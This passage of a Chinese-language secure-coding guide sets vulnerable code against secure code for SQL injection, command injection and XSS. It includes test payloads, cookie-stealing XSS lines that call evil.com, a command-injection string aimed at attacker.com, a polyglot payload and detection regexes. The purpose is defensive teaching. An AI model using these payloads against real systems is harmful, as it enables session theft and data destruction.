    return database.execute(query, [userId])

// SECURE: Named parameters
function getUserByEmailAndStatus(email, status):
    query = "SELECT * FROM users WHERE email = :email AND status = :status"
    return database.execute(query, {email: email, status: status})

// SECURE: Multiple value insertion
function createUser(name, email, role):
    query = "INSERT INTO users (name, email, role) VALUES (?, ?, ?)"
    return database.execute(query, [name, email, role])

// SECURE: IN clause with dynamic count
function getUsersByIds(userIds):
    placeholders = ", ".join(["?" for _ in userIds])
    query = f"SELECT * FROM users WHERE id IN ({placeholders})"
    return database.execute(query, userIds)

// SECURE: Transaction with multiple parameterized queries
function transferFunds(fromId, toId, amount):
    database.beginTransaction()
    try:
        database.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", [amount, fromId])
        database.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", [amount, toId])
        database.commit()
    catch error:
        database.rollback()
        throw error

为什么说它是安全的：

数据库驱动程序将查询结构与数据分离
参数永远不会被解释为 SQL
适用于所有标准数据类型
防止所有 SQL 注入变体出现在值位置

优秀示例 2：ORM 安全使用

// SECURE: ORM with typed queries
function getUserById(userId):
    return User.findOne({where: {id: userId}})

// SECURE: ORM with relationships
function getUserWithOrders(userId):
    return User.findOne({
        where: {id: userId},
        include: [{model: Order, as: 'orders'}]
    })

// SECURE: ORM query builder
function searchProducts(filters):
    query = Product.query()

    if filters.category:
        query = query.where('category', '=', filters.category)
    if filters.minPrice:
        query = query.where('price', '>=', filters.minPrice)
    if filters.maxPrice:
        query = query.where('price', '<=', filters.maxPrice)

    return query.get()

// WARNING: ORM raw query - still needs parameterization!
function customQuery(userId):
    // STILL VULNERABLE if using string interpolation:
    // return database.raw(f"SELECT * FROM users WHERE id = {userId}")

    // SECURE: Use ORM's parameterization
    return database.raw("SELECT * FROM users WHERE id = ?", [userId])

为什么说它是安全的：

ORM自动处理参数化
类型检查可以阻止某些注入尝试
查询构建器以编程方式构建安全查询。
仍然需要谨慎处理原始查询

优秀示例 3：安全的动态表/列名（允许列表）

// SECURE: Allowlist for table names
ALLOWED_TABLES = {"users", "products", "orders", "categories"}

function getDataFromTable(tableName, id):
    if tableName not in ALLOWED_TABLES:
        throw ValidationError("Invalid table name")

    // Safe because tableName is from allowlist, not user input
    query = f"SELECT * FROM {tableName} WHERE id = ?"
    return database.execute(query, [id])

// SECURE: Allowlist for sort columns
SORT_COLUMNS = {
    "name": "name",
    "price": "price",
    "date": "created_at",
    "popularity": "view_count"
}

function getProducts(sortBy, sortOrder):
    column = SORT_COLUMNS.get(sortBy, "name")  // Default to 'name'
    direction = "DESC" if sortOrder == "desc" else "ASC"

    query = f"SELECT * FROM products ORDER BY {column} {direction}"
    return database.execute(query)

// SECURE: Quoted identifiers as additional defense
function getDataDynamic(tableName, columnName, value):
    if tableName not in ALLOWED_TABLES:
        throw ValidationError("Invalid table")
    if columnName not in ALLOWED_COLUMNS[tableName]:
        throw ValidationError("Invalid column")

    // Use database quoting function for identifiers
    quotedTable = database.quoteIdentifier(tableName)
    quotedColumn = database.quoteIdentifier(columnName)

    query = f"SELECT * FROM {quotedTable} WHERE {quotedColumn} = ?"
    return database.execute(query, [value])

为什么说它是安全的：

允许列表确保只使用已知安全的值
用户输入映射到预定义的安全值
标识符引用提供了纵深防御能力
验证发生在查询构建之前。

优秀示例 4：安全命令执行

// SECURE: Argument array (no shell interpretation)
function pingHost(hostname):
    // Validate hostname format first
    if not isValidHostname(hostname):
        throw ValidationError("Invalid hostname format")

    // Use argument array - shell metacharacters are literal
    result = subprocess.run(
        ["ping", "-c", "4", hostname],
        shell = false,  // CRITICAL: no shell interpretation
        capture_output = true,
        timeout = 30
    )
    return result.stdout

// SECURE: Allowlist for command arguments
ALLOWED_FORMATS = {"png", "jpg", "gif", "webp"}

function convertImage(inputPath, outputPath, format):
    // Validate format from allowlist
    if format not in ALLOWED_FORMATS:
        throw ValidationError("Invalid format")

    // Validate paths are within allowed directory
    if not isPathWithinDirectory(inputPath, UPLOAD_DIR):
        throw ValidationError("Invalid input path")
    if not isPathWithinDirectory(outputPath, OUTPUT_DIR):
        throw ValidationError("Invalid output path")

    // Safe argument array
    result = subprocess.run(
        ["convert", inputPath, "-resize", "800x600", f"{outputPath}.{format}"],
        shell = false
    )
    return result

// SECURE: Using libraries instead of shell commands
function checkDiskUsage(directory):
    // Use language-native library instead of shell
    return filesystem.getDirectorySize(directory)

function readJsonFile(filepath):
    // Don't use: shell.execute(f"cat {filepath} | jq .")
    // Use language JSON library
    return json.parse(filesystem.readFile(filepath))

为什么说它是安全的：

参数数组直接将参数传递给程序。
没有对元字符的外壳解释
允许列表可防止意外值
路径验证可防止目录遍历。
本地库完全避免使用 shell。

边缘案例部分

特殊情况 1：二阶注入（先存储后执行）

// DANGEROUS: Data stored safely but used unsafely later

// Step 1: User creates profile (looks safe)
function createProfile(userId, displayName):
    // Parameterized - SAFE for initial storage
    query = "INSERT INTO profiles (user_id, display_name) VALUES (?, ?)"
    database.execute(query, [userId, displayName])
    // Attacker sets displayName = "admin'--"

// Step 2: Background job uses stored data UNSAFELY
function generateReportForUser(userId):
    // Get the stored display name
    profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])
    displayName = profile.display_name
    // "admin'--" retrieved from database

    // VULNERABLE: Trusting data from database
    reportQuery = f"INSERT INTO reports (title) VALUES ('Report for {displayName}')"
    database.execute(reportQuery)
    // Result: INSERT INTO reports (title) VALUES ('Report for admin'--')

// SECURE: Parameterize ALL queries, even with "internal" data
function generateReportForUserSafe(userId):
    profile = database.execute("SELECT display_name FROM profiles WHERE user_id = ?", [userId])

    // Still parameterize even though data is from database
    reportQuery = "INSERT INTO reports (title) VALUES (?)"
    database.execute(reportQuery, [f"Report for {profile.display_name}"])

检测：审核所有在后续查询中使用数据库数据的代码路径。

特殊情况 2：存储过程中的注入

// DANGEROUS: Dynamic SQL inside stored procedure

// Stored Procedure Definition (in database)
CREATE PROCEDURE searchUsers(searchTerm VARCHAR(100))
BEGIN
    // VULNERABLE: Dynamic SQL construction
    SET @query = CONCAT('SELECT * FROM users WHERE name LIKE ''%', searchTerm, '%''');
    PREPARE stmt FROM @query;
    EXECUTE stmt;
END

// Application code looks safe...
function searchUsers(term):
    return database.callProcedure("searchUsers", [term])
    // But injection still occurs inside the procedure!

// SECURE: Parameterized even in stored procedures
CREATE PROCEDURE searchUsersSafe(searchTerm VARCHAR(100))
BEGIN
    // Use parameterization within procedure
    SELECT * FROM users WHERE name LIKE CONCAT('%', searchTerm, '%');
    // Or use prepared statement properly
    SET @query = 'SELECT * FROM users WHERE name LIKE ?';
    SET @search = CONCAT('%', searchTerm, '%');
    PREPARE stmt FROM @query;
    EXECUTE stmt USING @search;
END

检测：检查所有存储过程是否存在动态 SQL 构造。

极端情况 3：通过编码旁路注入

// DANGEROUS: Encoding-based bypass attempts

// Scenario 1: Double-encoding bypass
function searchWithFilter(term):
    // Application URL-decodes once
    decoded = urlDecode(term)  // %2527 -> %27

    // WAF sees %27, not single quote
    // Second decode happens: %27 -> '

    query = f"SELECT * FROM items WHERE name = '{decoded}'"
    // Injection succeeds

// Scenario 2: Unicode normalization bypass
function filterUsername(username):
    // Check for dangerous characters
    if "'" in username or "\"" in username:
        throw ValidationError("Invalid characters")

    // VULNERABLE: Unicode normalization happens AFTER validation
    normalized = unicodeNormalize(username)
    // 'ʼ' (U+02BC) might normalize to "'" (U+0027) in some systems

    query = f"SELECT * FROM users WHERE username = '{normalized}'"

// SECURE: Parameterization makes encoding irrelevant
function searchSafe(term):
    // Encoding doesn't matter - it's just data
    query = "SELECT * FROM items WHERE name = ?"
    return database.execute(query, [term])

// SECURE: Validate AFTER all normalization
function filterUsernameSafe(username):
    // Normalize first
    normalized = unicodeNormalize(username)

    // Then validate
    if not isValidUsernameChars(normalized):
        throw ValidationError("Invalid characters")

    // Then use (still with parameterization)
    query = "SELECT * FROM users WHERE username = ?"
    return database.execute(query, [normalized])

检测：使用各种编码有效载荷（%27，，%2527Unicode 变体）进行测试。

常见错误部分

误区一：以为逃跑就足够了

// DANGEROUS: Manual escaping is error-prone

function getUserByNameEscaped(name):
    // "Escaping" by replacing quotes
    escapedName = name.replace("'", "''")
    query = f"SELECT * FROM users WHERE name = '{escapedName}'"
    return database.execute(query)

// Problems with this approach:
// 1. Different databases have different escape rules
// 2. Multibyte character encoding bypasses (GBK, etc.)
// 3. Doesn't handle all injection vectors
// 4. Easy to forget in one place
// 5. Backslash escaping varies by database

// Attack (MySQL with NO_BACKSLASH_ESCAPES off):
// name = "\' OR 1=1 --"
// Result: \'' OR 1=1 -- (backslash escapes first quote)

// Attack (multibyte): name = 0xbf27
// In GBK: 0xbf5c27 -> valid multibyte char + literal quote

// ALWAYS USE PARAMETERIZATION - it's not about escaping
function getUserByNameSafe(name):
    query = "SELECT * FROM users WHERE name = ?"
    return database.execute(query, [name])

关键见解：参数化不会“逃逸”——它会将查询结构和数据分开发送。

错误二：轻信“内部”数据源

// DANGEROUS: Trusting data because it's "internal"

function processMessage(messageFromQueue):
    // "This is from our internal queue, so it's safe"
    userId = messageFromQueue.userId

    query = f"SELECT * FROM users WHERE id = {userId}"
    return database.execute(query)

// BUT: Where did that queue message originate?
// - User input that was serialized to queue
// - External API response stored in queue
// - Another service that has its own vulnerabilities

// DANGEROUS: Trusting data from other tables/services
function getOrderDetails(orderId):
    order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId])

    // Order.notes was user-supplied
    query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'"
    // Still vulnerable to second-order injection

// SECURE: Parameterize ALL queries regardless of data source
function processMessageSafe(messageFromQueue):
    query = "SELECT * FROM users WHERE id = ?"
    return database.execute(query, [messageFromQueue.userId])

规则：在构建查询时，永远不要信任任何数据——始终要参数化。

错误 3：部分参数化

// DANGEROUS: Parameterizing some parts but not others

function searchUsers(name, sortColumn, limit):
    // Parameterized the value, but not ORDER BY or LIMIT
    query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}"
    return database.execute(query, [name])

// Attack: sortColumn = "1; DELETE FROM users; --"
// Attack: limit = "1 UNION SELECT password FROM admin_users"

// DANGEROUS: Parameterized WHERE but not table
function getDataFlexible(tableName, filterColumn, filterValue):
    query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?"
    return database.execute(query, [filterValue])
    // Table name and column still injectable

// SECURE: Validate/allowlist everything that can't be parameterized
function searchUsersSafe(name, sortColumn, limit):
    // Allowlist for sort column
    allowedSorts = {"name", "email", "created_at"}
    sortCol = sortColumn if sortColumn in allowedSorts else "name"

    // Validate limit is positive integer
    limitNum = min(max(int(limit), 1), 100)  // Clamp to 1-100

    query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}"
    return database.execute(query, [name])

关键见解：每个可注入位置都需要参数化或允许列表验证。

检测提示和测试方法

自动检测模式

// Regex patterns to find SQL injection vulnerabilities:

// 1. String concatenation with SQL keywords
regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i

// 2. Format strings with SQL
regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i

// 3. String interpolation in queries
regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/

// Command injection patterns:

// 4. Shell execution with concatenation
regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/

// 5. Shell=True with variables
regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/

手动测试方法

// SQL Injection Test Payloads:

basicTests = [
    "' OR '1'='1",           // Basic auth bypass
    "'; DROP TABLE test; --", // Stacked queries
    "' UNION SELECT null--",  // Union-based
    "1 AND 1=1",             // Boolean-based
    "1' AND SLEEP(5)--",     // Time-based blind
]

// Command Injection Test Payloads:

commandTests = [
    "; whoami",              // Command chaining
    "| id",                  // Pipe injection
    "$(whoami)",             // Command substitution
    "`id`",                  // Backtick substitution
    "& ping -c 4 attacker.com", // Background execution
]

// Testing Methodology:
1. Identify all input points (forms, URLs, headers, JSON fields)
2. Trace input flow to database queries or shell commands
3. Inject test payloads at each point
4. Monitor for:
   - SQL errors in response
   - Time delays (for blind injection)
   - DNS/HTTP callbacks (for out-of-band)
   - Changed behavior indicating injection success

代码审查清单

查看	需要注意什么
查询构造	任何字符串连接或与查询字符串的插值
动态标识符	用户输入的表名、列名、排序依据
ORM 中的原始查询	`.raw()`，，`.execute()`或类似字符串构建
Shell 执行	任何使用`system()`，，`exec()shell=True`
指挥大楼	命令执行前进行字符串拼接
输入源	跟踪从请求到查询/命令的数据

安全检查清单

所有 SQL 查询都使用参数化语句或预处理查询。
ORM 原始查询也使用参数化
动态表/列名根据严格的允许列表进行验证
ORDER BY 和 LIMIT 子句使用已验证/允许列表的值
子进程调用中没有 shell=True
所有命令行参数都以数组形式传递，而不是字符串形式传递。
用户控制的文件路径已验证并清理
用户输入未设置环境变量
考虑二阶注入（数据库数据仍已参数化）
已审查内部动态 SQL 的存储过程
输入验证在任何规范化/解码之前进行。
代码审查专门检查所有查询/命令构造

模式 3：跨站脚本攻击 (XSS)

CWE 参考： CWE-79（网页生成过程中输入的不正确中和）、CWE-80（基本 XSS）、CWE-83（属性中的不正确中和）、CWE-87（URI 中的不正确中和）

优先级评分： 23（频率：10，严重性：8，可检测性：5）

引言：为什么人工智能经常忽略上下文相关的编码

跨站脚本攻击（XSS）是人工智能生成代码中最常见的漏洞之一。研究表明，86% 的人工智能生成代码无法抵御 XSS 攻击（Veracode 2025），而且人工智能生成代码包含 XSS 的可能性是人类编写代码的 2.74 倍（CodeRabbit 分析）。

为什么人工智能模型会产生 XSS 漏洞：

上下文盲点： XSS 防护需要理解用户输入将被渲染的上下文——HTML 正文、属性、JavaScript、CSS 或 URL。每种上下文都需要不同的编码。由于缺乏对渲染上下文的感知，AI 模型经常使用通用编码或不进行编码。
训练数据显示 innerHTML 无处不在：教程和 Stack Overflow 上的回答大量使用 `<div>` innerHTML、document.write()`<span>` 和模板字符串注入来进行 DOM 操作。人工智能将这些学习为标准模式。
框架误解：像 React 这样的现代框架提供了自动转义，但 AI 经常使用 `<div>`、`<span>` 或原始模板插值来绕过这些安全措施，尤其是dangerouslySetInnerHTML在v-html任务似乎需要“丰富的”HTML 输出时。
编码与验证的混淆：人工智能模型通常会进行输入验证（检查允许的字符），但会忽略输出编码（安全地在上下文中呈现数据）。验证是为了确保数据完整性；编码是为了防止跨站脚本攻击 (XSS)。
客户端信任：人工智能通常将客户端代码视为“安全”的，因为它运行在浏览器中。它无法识别出跨站脚本攻击（XSS）正是利用了浏览器对应用程序的信任。

XSS 的影响：

会话劫持：攻击者窃取会话 cookie 并冒充受害者
账户盗用：键盘记录、凭证窃取或强制更改密码
数据泄露：窃取向用户显示的敏感数据
恶意软件传播：将用户重定向到恶意网站
篡改页面：更改页面内容以进行网络钓鱼或损害声誉。
蠕虫传播：自我传播的XSS（Samy蠕虫感染了100万MySpace用户）

XSS 变体：

类型	贮存	执行	示例向量
反射	URL/请求	即时	在搜索结果页面中搜索查询
已存储	数据库	后来的访客	在博客中使用脚本发表评论
基于 DOM 的	客户端	JavaScript 进程	由JS处理的URL片段
突变（mXSS）	消毒器旁路	DOM突变	解析过程中发生变化的标记

多个不同语境下的不良示例

错误示例 1：HTML 主体注入

// VULNERABLE: Direct injection into HTML body
function displayUserComment(comment):
    // User input directly placed in HTML
    document.getElementById("comments").innerHTML =
        "<div class='comment'>" + comment + "</div>"

// Attack: comment = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"
// Result: Script executes, cookies sent to attacker

// VULNERABLE: Server-side template without encoding
function renderProfilePage(username, bio):
    return """
        <html>
        <body>
            <h1>Profile: {username}</h1>
            <p>{bio}</p>
        </body>
        </html>
    """.format(username=username, bio=bio)

// Attack: bio = "<img src=x onerror='alert(document.cookie)'>"
// Result: onerror handler executes JavaScript

// VULNERABLE: Using document.write
function showWelcome(name):
    document.write("<h2>Welcome, " + name + "!</h2>")

// Attack: name = "<img src=x onerror=alert('XSS')>"

为什么这样做很危险：

脚本标签在 DOM 插入后立即执行。
事件处理程序（onerror，，onload）onclick执行时不带脚本标签
SVG元素可以包含可执行代码
document.write并innerHTML解析用户输入中的 HTML

错误示例 2：HTML 属性注入

// VULNERABLE: User input in HTML attributes
function renderImage(imageUrl, altText):
    return '<img src="' + imageUrl + '" alt="' + altText + '">'

// Attack: altText = '" onmouseover="alert(document.cookie)" x="'
// Result: <img src="img.jpg" alt="" onmouseover="alert(document.cookie)" x="">

// VULNERABLE: Unquoted attributes
function renderLink(url, text):
    return "<a href=" + url + ">" + text + "</a>"

// Attack: url = "http://site.com onclick=alert(1)"
// Result: <a href=http://site.com onclick=alert(1)>text</a>

// VULNERABLE: Input in style attribute
function setBackgroundColor(color):
    element.setAttribute("style", "background-color: " + color)

// Attack: color = "red; background-image: url('javascript:alert(1)')"
// Attack: color = "expression(alert('XSS'))"  // IE-specific

// VULNERABLE: Event handler attribute
function renderButton(buttonId, label):
    return '<button id="' + buttonId + '" onclick="handleClick(\'' + label + '\')">' + label + '</button>'

// Attack: label = "'); alert(document.cookie); ('"
// Result: onclick="handleClick(''); alert(document.cookie); ('")"

为什么这样做很危险：

未加引号的属性会在空格处断开，从而允许添加新属性。
带引号的属性可以与匹配的引号分开。
事件处理程序属性直接执行 JavaScript
某些属性（href，，src）style具有特殊的解析规则

反面例子 3：JavaScript 上下文注入

// VULNERABLE: User input embedded in JavaScript
function generateUserScript(username):
    return """
        <script>
            var currentUser = '{username}';
            displayGreeting(currentUser);
        </script>
    """.format(username=username)

// Attack: username = "'; alert(document.cookie); //'"
// Result: var currentUser = ''; alert(document.cookie); //';

// VULNERABLE: JSON data embedded in script
function embedUserData(userData):
    return """
        <script>
            var data = {userData};
            processData(data);
        </script>
    """.format(userData=jsonEncode(userData))

// Attack: userData contains </script><script>alert(1)</script>
// JSON encoding doesn't prevent HTML context escape

// VULNERABLE: Template literals with user input
function renderTemplate(message):
    return `<script>showNotification("${message}")</script>`

// Attack: message = '${alert(document.cookie)}'  // Template literal injection
// Attack: message = '");alert(document.cookie);//'  // String escape

// VULNERABLE: Dynamic script construction
function addEventHandler(eventName, userCallback):
    element.setAttribute("onclick", "handleEvent('" + userCallback + "')")

// Attack: userCallback = "'); stealData(); ('"

为什么这样做很危险：

JavaScript 字符串上下文需要 JavaScript 特有的转义
HTML 结束标签 ( </script>) 可以跳出脚本块。
模板字面量本身也存在注入风险。
内联事件处理程序会将 HTML 和 JavaScript 上下文复合起来。

错误示例 4：URL 上下文注入

// VULNERABLE: User input in href attribute
function renderNavLink(destination):
    return '<a href="' + destination + '">Click here</a>'

// Attack: destination = "javascript:alert(document.cookie)"
// Result: <a href="javascript:alert(document.cookie)">Click here</a>

// VULNERABLE: URL parameters without encoding
function buildSearchUrl(query):
    return '<a href="/search?q=' + query + '">Search again</a>'

// Attack: query = '" onclick="alert(1)" x="'
// Result: <a href="/search?q=" onclick="alert(1)" x="">Search again</a>

// VULNERABLE: Redirect based on user input
function handleRedirect(url):
    window.location = url

// Attack: url = "javascript:alert(document.cookie)"
// Result: JavaScript execution via location change

// VULNERABLE: Open redirect leading to XSS
function redirectAfterLogin(returnUrl):
    return '<meta http-equiv="refresh" content="0;url=' + returnUrl + '">'

// Attack: returnUrl = "data:text/html,<script>alert(1)</script>"
// Attack: returnUrl = "javascript:alert(1)"

为什么这样做很危险：

javascript:URL在被导航时会执行代码。
data:URL 可以包含可执行的 HTML/JavaScript 代码。
vbscript:URL 在旧版 IE 浏览器上执行
单靠 URL 编码无法阻止基于协议的攻击

反例 5：CSS 上下文注入

// VULNERABLE: User input in CSS
function applyCustomStyle(customCss):
    styleElement = document.createElement("style")
    styleElement.textContent = ".user-style { " + customCss + " }"
    document.head.appendChild(styleElement)

// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {"
// Result: CSS exfiltration of page data

// VULNERABLE: CSS expression (legacy IE)
function setWidth(width):
    element.style.cssText = "width: " + width

// Attack: width = "expression(alert(document.cookie))"
// Result: JavaScript execution via CSS expression (IE)

// VULNERABLE: CSS injection via style attribute
function renderAvatar(avatarUrl):
    return '<div style="background-image: url(' + avatarUrl + ')"></div>'

// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x"
// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '"

// VULNERABLE: CSS @import injection
function loadTheme(themeUrl):
    return "<style>@import url('" + themeUrl + "');</style>"

// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?"

为什么这样做很危险：

url()CSS 可以通过请求泄露数据。
旧版IE浏览器expression()会执行JavaScript
CSS注入可以改变页面外观，从而进行网络钓鱼。
@import可以加载攻击者控制的样式表

针对每种情境的优秀示例

优秀示例 1：正确的 HTML 编码

// SECURE: HTML entity encoding for body content
function htmlEncode(str):
    return str
        .replace("&", "&amp;")    // Must be first
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#x27;")
        .replace("/", "&#x2F;")   // Prevents </script> escapes

function displayUserComment(comment):
    safeComment = htmlEncode(comment)
    document.getElementById("comments").innerHTML =
        "<div class='comment'>" + safeComment + "</div>"

// SECURE: Using textContent instead of innerHTML
function displayUserCommentSafe(comment):
    div = document.createElement("div")
    div.className = "comment"
    div.textContent = comment  // Automatically safe - no HTML interpretation
    document.getElementById("comments").appendChild(div)

// SECURE: Server-side template with auto-escaping
function renderProfilePage(username, bio):
    // Use templating engine with auto-escaping enabled
    return template.render("profile.html", {
        username: username,  // Engine auto-escapes
        bio: bio
    })

// SECURE: Framework createElement pattern
function createUserCard(name, email):
    card = document.createElement("article")

    nameEl = document.createElement("h3")
    nameEl.textContent = name  // Safe

    emailEl = document.createElement("p")
    emailEl.textContent = email  // Safe

    card.appendChild(nameEl)
    card.appendChild(emailEl)
    return card

为什么说它是安全的：

HTML实体以文本形式显示，而不是被解释为标记。
textContent从不解释 HTML
createElement + textContent 本质上是安全的
自动转义模板会自动处理编码。

优秀示例 2：正确的属性编码

// SECURE: Attribute encoding (superset of HTML encoding)
function attributeEncode(str):
    return str
        .replace("&", "&amp;")
        .replace("<", "&lt;")
        .replace(">", "&gt;")
        .replace('"', "&quot;")
        .replace("'", "&#x27;")
        .replace("`", "&#x60;")
        .replace("=", "&#x3D;")

// SECURE: Always quote attributes and encode values
function renderImage(imageUrl, altText):
    safeUrl = attributeEncode(imageUrl)
    safeAlt = attributeEncode(altText)
    return '<img src="' + safeUrl + '" alt="' + safeAlt + '">'

// SECURE: Using setAttribute (browser handles encoding)
function renderImageSafe(imageUrl, altText):
    img = document.createElement("img")
    img.setAttribute("src", imageUrl)   // Safe
    img.setAttribute("alt", altText)    // Safe
    return img

// SECURE: Data attributes with proper encoding
function renderDataElement(userId, userName):
    div = document.createElement("div")
    div.dataset.userId = userId      // Automatically safe
    div.dataset.userName = userName  // Automatically safe
    return div

// SECURE: Style attribute with validation
ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"}

function setBackgroundColor(color):
    if color in ALLOWED_COLORS:
        element.style.backgroundColor = color
    else:
        element.style.backgroundColor = "white"  // Safe default

为什么说它是安全的：

引号会阻止属性分离
编码会阻止引号转义
setAttribute 会自动处理编码。
数据集属性自动安全
允许列表可以防止注入任意值

优秀示例 3：JavaScript 编码

// SECURE: JavaScript string encoding
function jsStringEncode(str):
    return str
        .replace("\\", "\\\\")     // Backslash first
        .replace("'", "\\'")
        .replace('"', '\\"')
        .replace("\n", "\\n")
        .replace("\r", "\\r")
        .replace("</", "<\\/")     // Prevent script tag escape
        .replace("<!--", "\\x3C!--") // Prevent HTML comment

// SECURE: JSON encoding for embedding data
function generateUserScript(userData):
    // Use proper JSON encoding and parse safely
    jsonData = jsonEncode(userData)

    // Also HTML-encode to prevent </script> breakout
    safeJson = htmlEncode(jsonData)

    return """
        <script>
            var data = JSON.parse('{safeJson}');
            processData(data);
        </script>
    """.format(safeJson=safeJson)

// BETTER: Use data attributes instead of inline scripts
function embedUserDataSafe(element, userData):
    // Store data in attribute, process in external script
    element.dataset.user = jsonEncode(userData)
    // External script reads: JSON.parse(element.dataset.user)

// SECURE: Separate data from code with JSON endpoint
function loadUserData():
    // Instead of embedding in HTML, fetch from API
    fetch('/api/user/data')
        .then(response => response.json())
        .then(data => processData(data))

// SECURE: Using structured data in script type
function embedStructuredData(pageData):
    return """
        <script type="application/json" id="page-data">
            {jsonData}
        </script>
        <script>
            var data = JSON.parse(
                document.getElementById('page-data').textContent
            );
        </script>
    """.format(jsonData=jsonEncode(pageData))

为什么说它是安全的：

JavaScript 转义可防止字符串中断
脚本块中的 HTML 编码会阻止</script>转义
数据属性将数据与代码分离。
JSON 端点避免在 HTML 中嵌入不受信任的数据。
type="application/json"代码块不会作为 JavaScript 执行。

优秀示例 4：URL 编码

// SECURE: URL encoding for query parameters
function urlEncode(str):
    return encodeURIComponent(str)

function buildSearchUrl(query):
    safeQuery = urlEncode(query)
    return '/search?q=' + safeQuery

// SECURE: Validating URL schemes (allowlist)
SAFE_SCHEMES = {"http", "https", "mailto"}

function validateUrl(url):
    try:
        parsed = parseUrl(url)
        if parsed.scheme.lower() in SAFE_SCHEMES:
            return url
    catch:
        pass
    return "/fallback"  // Safe default

function renderLink(destination, text):
    safeUrl = validateUrl(destination)
    safeText = htmlEncode(text)
    return '<a href="' + attributeEncode(safeUrl) + '">' + safeText + '</a>'

// SECURE: URL validation with additional checks
function validateExternalUrl(url):
    parsed = parseUrl(url)

    // Check scheme
    if parsed.scheme.lower() not in {"http", "https"}:
        return null

    // Check for credential injection
    if parsed.username or parsed.password:
        return null

    // Check for IP address (optional restriction)
    if isIpAddress(parsed.host):
        return null

    return url

// SECURE: Relative URLs only (prevent open redirect)
function validateRedirectUrl(url):
    // Only allow relative paths
    if url.startsWith("/") and not url.startsWith("//"):
        // Prevent path traversal
        normalized = normalizePath(url)
        if not ".." in normalized:
            return normalized
    return "/"  // Safe default

为什么说它是安全的：

encodeURIComponent处理特殊字符
Scheme allowlist阻止javascript:URLdata:
仅支持相对路径的验证可以防止开放式重定向。
多层验证提供纵深防御

优秀示例 5：使用安全的 API（textContent 与 innerHTML）

// SECURE: Safe DOM manipulation patterns

// Instead of innerHTML with user data:
// DANGEROUS: element.innerHTML = "<p>" + userInput + "</p>"

// SECURE: Use textContent for text nodes
function setElementText(element, text):
    element.textContent = text  // Never interprets HTML

// SECURE: Build DOM programmatically
function createListItem(text, isHighlighted):
    li = document.createElement("li")
    li.textContent = text  // Safe text assignment

    if isHighlighted:
        li.classList.add("highlighted")  // Safe class manipulation

    return li

// SECURE: Use template elements for complex HTML
function createCardFromTemplate(name, description):
    template = document.getElementById("card-template")
    card = template.content.cloneNode(true)

    // Set text content safely
    card.querySelector(".card-name").textContent = name
    card.querySelector(".card-desc").textContent = description

    return card

// SECURE: Use DocumentFragment for batch operations
function renderList(items):
    fragment = document.createDocumentFragment()

    for item in items:
        li = document.createElement("li")
        li.textContent = item.name  // Safe
        fragment.appendChild(li)

    document.getElementById("list").appendChild(fragment)

// SECURE: Sanitize when HTML is genuinely needed
function renderRichContent(htmlContent):
    // Use DOMPurify or similar trusted sanitizer
    sanitized = DOMPurify.sanitize(htmlContent, {
        ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
        ALLOWED_ATTR: ["href"],
        ALLOW_DATA_ATTR: false
    })
    element.innerHTML = sanitized

为什么说它是安全的：

textContent从不解析 HTML 或脚本。
createElement+textContent本质上是安全的
模板允许使用复杂的 HTML 代码，而无需担心注入风险。
当需要 HTML 时，DOMPurify 提供清理功能。

边缘案例部分

极端情况 1：变异型 XSS (mXSS)

// DANGEROUS: Browser mutations can bypass sanitization

// How mXSS works:
// 1. Sanitizer processes malformed HTML
// 2. Browser "fixes" the HTML during parsing
// 3. Fixed HTML contains executable content

// Example: Backtick mutation
inputHtml = "<img src=x onerror=`alert(1)`>"
// Some sanitizers don't escape backticks
// Browser may convert backticks to quotes in certain contexts

// Example: Namespace confusion
inputHtml = "<math><annotation-xml><foreignObject><script>alert(1)</script>"
// SVG/MathML namespaces have different parsing rules
// Sanitizer might miss the nested script

// Example: Table element mutations
inputHtml = "<table><form><input name='x'></form></table>"
// Browser moves <form> outside <table> during parsing
// Can result in unexpected DOM structure

// SECURE: Use battle-tested sanitizer with mXSS protection
function sanitizeHtml(html):
    return DOMPurify.sanitize(html, {
        // DOMPurify has mXSS protection built-in
        USE_PROFILES: {html: true},
        // Optionally restrict further
        FORBID_TAGS: ["style", "math", "svg"],
        FORBID_ATTR: ["style"]
    })

// BETTER: Avoid HTML sanitization when possible
function renderUserContent(content):
    // If you only need formatted text, use markdown
    markdownHtml = markdownToHtml(content)  // Controlled conversion
    return DOMPurify.sanitize(markdownHtml)

检测：使用以下方法测试：

畸形嵌套（<a><table><a>）
命名空间元素（<svg>，，<math>）<foreignObject>
反引号和其他不常见的引号字符
处理指令类内容（<?xml>）

特殊情况 2：多语言有效载荷

// DANGEROUS: Payloads that work in multiple contexts

// Polyglot XSS example:
payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>"

// This payload attempts to work in:
// - JavaScript context (javascript: URL)
// - HTML attribute context (onclick)
// - Inside HTML comments
// - Inside style/title/textarea/script tags
// - SVG context

// Why this matters:
// - Single payload tests multiple vectors
// - Fuzzy input handling might trigger in unexpected context
// - Copy-paste from "safe" context to unsafe context

